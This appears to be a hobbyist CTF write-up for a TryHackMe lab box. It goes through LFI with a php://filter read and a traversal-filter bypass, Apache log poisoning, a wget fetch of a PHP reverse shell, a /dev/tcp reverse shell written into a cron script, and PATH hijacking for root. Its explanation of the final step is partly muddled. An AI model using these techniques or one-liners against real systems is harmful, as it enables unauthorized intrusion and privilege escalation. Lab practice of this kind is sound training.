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Hello guys and welcome to yet another writeup. This is ye another easy box on tryhackme and is accessible here We shall tackle some awesome topics which include:

  1. LFI.
  2. Priviledge exploitation.
  3. Web exploitation. With that said let us get right to it

NMAP scan.

As usual we are gonna start of by scanning open ports on our machine.


We are able to see that port 80 is open and is hosting a web application. we are able to view a home page which does not have alot on it but we can see a type of hostname


We can actually use this and and it to our /etc/hosts file, then try and go to the page.



Okay guys it is about to get really messy in here. Stay frosty.

So first of all we are going to FUZZ for hidden directories.


And we get a hit for robots.txt. which when we visit the page looks something like this.


And we can actually see another directory /test.php. visit this page and we can view another page with a button.


We can then see that the button redirects us to ?view=/var/www/html/development_testing/mrrobot.php.

From here we can try to do a path traversal filter. After hours of trial and error I found this filter and it worked. php://filter/convert.base64-encode/resource= Okay so now we can see some base64 code let us try and change mrrobot.php to test.php. And we can see some more base64. let us decode that.


And we can get a flag but also we can see some php filters on it.


Okay so the filter dictates that using ../.. which we can easily bypasss by using ..//..

Next let us try and view the access log using the bypass.


So next we can try and pass some malicious code to the user agent. . So to do this follow this steps.

  1. right click and press Inspect on the dropdown menu.
  2. click on the Network option and reload the page
  3. Hit resend.
  4. scroll to the user agent and replace with the malicious code.
  5. Hit send.

Smooth so next up let us try and execute some commands on it. let us try and add &cmd=ls to the end of the url.


We can actually run commands on it. so next let us try and get a reverse shell.


So we are going to get a sample php reverse shell from pentestmonkey Next, we are going to set up a python server on our machine. Next, we are going to run &cmd=wget http://ip/revshell.php We should be able to get a 200 code on our machine.


next start up a listener on your machine Then run &cmd=php revshell.php going back to our listener we have a shell.


Switch user.

So next we can get a better shell by using python3 -c “import pty;pty.spawn(’/bin/bash -i’)”

Then we can check out the cron jobs cat /etc/crontab

We can actually see that a job runs as archangel every minute. Which we can read and write. So we then run echo “bash -i >& /dev/tcp/ip/1235 0>&1” » /opt/


Then run another listener and wait for a minute. Coffee break.


Moving into the secret directory we can see a file called backup. Running does not do much so we are going to do something crazy. So type:

  1. echo ‘/bin/bash -p’ > cp
  2. chmod 777 cp
  3. export PATH=/home/archangel/secret:$PATH
  4. echo $PATH
  5. ./backup

Okay let us dig into what jus happened. This is gonna be crazy but heck.

  1. echo ‘/bin/bash -p’ > cp: This command redirects the output of the echo command, which is the string '/bin/bash -p', into a file named cp. The content of the cp file will be /bin/bash -p.

  2. chmod 777 cp: This command changes the permissions of the cp file to allow all users to read, write, and execute it. The chmod command is used to modify file permissions, and 777 is a symbolic representation that grants all permissions to the owner, group, and others.

  3. export PATH=/home/archangel/secret:$PATH: This command adds a directory called /home/archangel/secret to the beginning of the PATH environment variable. The PATH variable contains a list of directories that the shell searches for executable files. By adding /home/archangel/secret at the beginning, any executable file in that directory will take precedence over files with the same name in other directories listed in PATH.

  4. echo $PATH: This command displays the value of the PATH environment variable. After the previous export command, it will show /home/archangel/secret followed by the original directories that were part of PATH.

  5. ./backup: This command attempts to execute a file named backup in the current directory. The ./ prefix indicates that the file should be executed from the current directory instead of searching for it in the directories listed in PATH. If the backup file exists and has executable permissions, it will be run with the elevated privileges specified in step 1 (/bin/bash -p).

Overall, these commands create a file called cp with elevated permissions, modify the PATH environment variable to prioritize a specific directory, and execute a file named backup with elevated privileges. The exact consequences and implications of these actions depend on the specific context and contents of the backup file.

And yes we are root.




Okay honestly that was a great learning experience for me and I hope it is the same for you. Happy hacking :)